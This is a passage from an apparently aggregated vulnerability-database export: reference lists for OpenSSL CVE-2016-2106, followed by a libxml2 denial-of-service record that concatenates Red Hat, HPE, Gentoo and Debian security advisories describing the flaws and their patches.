"http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2016\u0026m=slackware-security.542103" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00019.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00055.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1035721" }, { "trust": 1.7, "url": "http://www.debian.org/security/2016/dsa-3566" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00030.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00011.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00008.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183607.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00029.html" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa123" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/136912/slackware-security-advisory-openssl-updates.html" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-18" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03756en_us" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03765en_us" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20160504-0001/" }, { "trust": 1.7, "url": "https://source.android.com/security/bulletin/pixel/2017-11-01" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-2073.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-2056.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=3f3582139fbb259a1c3cbb0a25236500a409bf26" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.6, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=3f3582139fbb259a1c3cbb0a25236500a409bf26" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1331536" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2016/may/25" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05320149" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023814" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024319" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000158" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021361" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021376" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/56?aspxautodetectcookiesupport=1" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987903" }, { "trust": 0.3, "url": "https://support.asperasoft.com/hc/en-us/articles/229505687-security-bulletin-multiple-openssl-vulnerabilities-affect-ibm-aspera-shares-1-9-2-or-earlier-%20-ibm-aspera-console-3-0-6-or-earlier" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024066" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988007" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009147" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984323" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21984483" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984583" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984609" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984794" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984920" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984977" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985736" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986068" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986123" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986152" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986260" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986473" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986563" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986564" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987671" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987968" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988055" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988071" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988189" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988350" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988383" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989046" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992493" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory20.asc" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-3110" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3110" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5387" }, { "trust": 0.2, "url": "https://access.redhat.com/site/documentation/en-us/jboss_enterprise_web_server/2/html-single/installation_guide/index.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-5387" }, { "trust": 0.2, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/2.1/html/2.1.1_release_notes/index.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/vulnerabilities/httpoxy" }, { "trust": 0.2, "url": "https://access.redhat.com/site/documentation/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2109" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2108" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/189.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2016:2073" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2959-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49332" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03756en_us" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0204" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3570" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=distributions\u0026version=2.1.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2107" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2178" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7052" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6304" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6305" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-7052" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.1, "url": "http://eprint.iacr.org/2016/594.pdf" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2177" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6306" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2016-2055.html" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/2688611" }, { "trust": 0.1, "url": "https://access.redhat.com/solutions/222023" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4459" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-4000" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3183" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4459" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3195" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3183" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/6.4/index.html" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2842" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0799" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2d-0ubuntu1.5" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.19" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.36" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2106" }, { "db": "BID", "id": "89744" }, { "db": "PACKETSTORM", "id": "138471" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "138473" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "139115" }, { "db": "PACKETSTORM", "id": "136937" }, { "db": "PACKETSTORM", "id": "136895" }, { "db": "CNNVD", "id": "CNNVD-201605-082" }, { "db": "NVD", "id": "CVE-2016-2106" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2106" }, { "db": "BID", "id": "89744" }, { "db": "PACKETSTORM", "id": "138471" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "138473" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "139115" }, { "db": "PACKETSTORM", "id": "136937" }, { "db": "PACKETSTORM", "id": "136895" }, { "db": "CNNVD", "id": "CNNVD-201605-082" }, { "db": "NVD", "id": "CVE-2016-2106" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-05-05T00:00:00", "db": "VULMON", "id": "CVE-2016-2106" }, { "date": "2016-05-03T00:00:00", "db": "BID", "id": "89744" }, { "date": "2016-08-22T23:23:00", "db": "PACKETSTORM", "id": "138471" }, { "date": "2017-06-05T18:18:00", "db": "PACKETSTORM", "id": "142803" }, { "date": "2016-08-22T23:25:00", "db": "PACKETSTORM", "id": "138473" }, { "date": "2016-12-07T16:37:31", "db": "PACKETSTORM", "id": "140056" }, { "date": "2016-10-12T20:28:07", "db": "PACKETSTORM", "id": "139115" }, { "date": "2016-05-09T14:05:44", "db": "PACKETSTORM", "id": "136937" }, { "date": "2016-05-03T22:56:05", "db": "PACKETSTORM", "id": "136895" }, { "date": "2016-05-04T00:00:00", "db": "CNNVD", "id": "CNNVD-201605-082" }, { "date": "2016-05-05T01:59:02.217000", "db": "NVD", "id": "CVE-2016-2106" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-2106" }, { "date": "2017-05-02T01:10:00", "db": "BID", "id": "89744" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201605-082" }, { "date": "2023-11-07T02:30:55.767000", "db": "NVD", "id": "CVE-2016-2106" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "136895" }, { "db": "CNNVD", "id": "CNNVD-201605-082" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Integer overflow vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-082" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "digital error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-082" } ], "trust": 0.6 } }
var-201511-0037
Vulnerability from variot
The xmlParseConditionalSections function in parser.c in libxml2 does not properly skip intermediary entities when it stops parsing invalid input, which allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via crafted XML data, a different vulnerability than CVE-2015-7941. Libxml2 is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application; denying service to legitimate users. Due to the nature of this issue, code-execution may be possible but this has not been confirmed. Libxml2 2.9.2 and prior are vulnerable. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
This release of Red Hat JBoss Web Server 3.0.3 serves as a replacement for Red Hat JBoss Web Server 3.0.2, and includes bug fixes and enhancements, which are documented in the Release Notes documented linked to in the References. (CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7942, CVE-2015-8035, CVE-2015-8710, CVE-2015-7941, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317)
-
A session fixation flaw was found in the way Tomcat recycled the requestedSessionSSL field. If at least one web application was configured to use the SSL session ID as the HTTP session ID, an attacker could reuse a previously used session ID for further requests. (CVE-2015-5346)
-
A CSRF flaw was found in Tomcat's the index pages for the Manager and Host Manager applications. These applications included a valid CSRF token when issuing a redirect as a result of an unauthenticated request to the root of the web application. This token could then be used by an attacker to perform a CSRF attack. (CVE-2015-5351)
-
It was found that several Tomcat session persistence mechanisms could allow a remote, authenticated user to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that placed a crafted object in a session. (CVE-2016-0714)
-
A security manager bypass flaw was found in Tomcat that could allow remote, authenticated users to access arbitrary application data, potentially resulting in a denial of service. (CVE-2016-0763)
-
A use-after-free flaw was found in the way OpenSSL imported malformed Elliptic Curve private keys. (CVE-2015-0209)
-
It was found that Tomcat could reveal the presence of a directory even when that directory was protected by a security constraint. A user could make a request to a directory via a URL not ending with a slash and, depending on whether Tomcat redirected that request, could confirm whether that directory existed. (CVE-2015-5345)
-
It was found that Tomcat allowed the StatusManagerServlet to be loaded by a web application when a security manager was configured. This allowed a web application to list all deployed web applications and expose sensitive information such as session IDs. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JWS-271 - User submitted session ID JWS-272 - User submitted session ID JWS-276 - Welcome File processing refactoring - CVE-2015-5345 low JWS-277 - Welcome File processing refactoring - CVE-2015-5345 low JWS-303 - Avoid useless session creation for manager webapps - CVE-2015-5351 moderate JWS-304 - Restrict another manager servlet - CVE-2016-0706 low JWS-349 - Session serialization safety - CVE-2016-0714 moderate JWS-350 - Protect ResourceLinkFactory.setGlobalContext() - CVE-2016-0763 moderate
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c04944172
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04944172 Version: 1
HPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager running libXML2, Remote or Local Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
References:
- CVE-2015-5312
- CVE-2015-7497
- CVE-2015-7498
- CVE-2015-7499
- CVE-2015-7500
- CVE-2015-7941
- CVE-2015-7942
- CVE-2015-8241
- CVE-2015-8242
- CVE-2015-8317
- PSRT110015
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- IceWall File Manager 3.0
- IceWall Federation Agent 3.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-5312 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2015-7497 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7498 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7499 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-7500 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7941 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-7942 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-8241 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2015-8242 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8 CVE-2015-8317 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HPE recommends applying the latest OS vendor security patches for libXML2 to resolve the vulnerabilities in the libXML2 library.
Please note that the HP IceWall product is only available in Japan.
HISTORY Version:1 (rev.1) - 22 January 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel.
Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201701-37
https://security.gentoo.org/
Severity: Normal Title: libxml2: Multiple vulnerabilities Date: January 16, 2017 Bugs: #564776, #566374, #572878, #573820, #577998, #582538, #582540, #583888, #589816, #597112, #597114, #597116 ID: 201701-37
Synopsis
Multiple vulnerabilities have been found in libxml2, the worst of which could lead to the execution of arbitrary code.
Background
libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.9.4-r1 >= 2.9.4-r1
Description
Multiple vulnerabilities have been discovered in libxml2. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All libxml2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.9.4-r1"
References
[ 1 ] CVE-2015-1819 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1819 [ 2 ] CVE-2015-5312 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5312 [ 3 ] CVE-2015-7497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7497 [ 4 ] CVE-2015-7498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7498 [ 5 ] CVE-2015-7499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7499 [ 6 ] CVE-2015-7500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7500 [ 7 ] CVE-2015-7941 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7941 [ 8 ] CVE-2015-7942 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7942 [ 9 ] CVE-2015-8035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8035 [ 10 ] CVE-2015-8242 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8242 [ 11 ] CVE-2015-8806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8806 [ 12 ] CVE-2016-1836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1836 [ 13 ] CVE-2016-1838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1838 [ 14 ] CVE-2016-1839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1839 [ 15 ] CVE-2016-1840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1840 [ 16 ] CVE-2016-2073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2073 [ 17 ] CVE-2016-3627 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3627 [ 18 ] CVE-2016-3705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3705 [ 19 ] CVE-2016-4483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4483 [ 20 ] CVE-2016-4658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4658 [ 21 ] CVE-2016-5131 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5131
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201701-37
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
For the oldstable distribution (wheezy), these problems have been fixed in version 2.8.0+dfsg1-7+wheezy5.
For the stable distribution (jessie), these problems have been fixed in version 2.9.1+dfsg1-5+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 2.9.3+dfsg1-1 or earlier versions.
For the unstable distribution (sid), these problems have been fixed in version 2.9.3+dfsg1-1 or earlier versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: libxml2 security update Advisory ID: RHSA-2015:2550-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2550.html Issue date: 2015-12-07 CVE Names: CVE-2015-1819 CVE-2015-5312 CVE-2015-7497 CVE-2015-7498 CVE-2015-7499 CVE-2015-7500 CVE-2015-7941 CVE-2015-7942 CVE-2015-8241 CVE-2015-8242 CVE-2015-8317 =====================================================================
- Summary:
Updated libxml2 packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7.
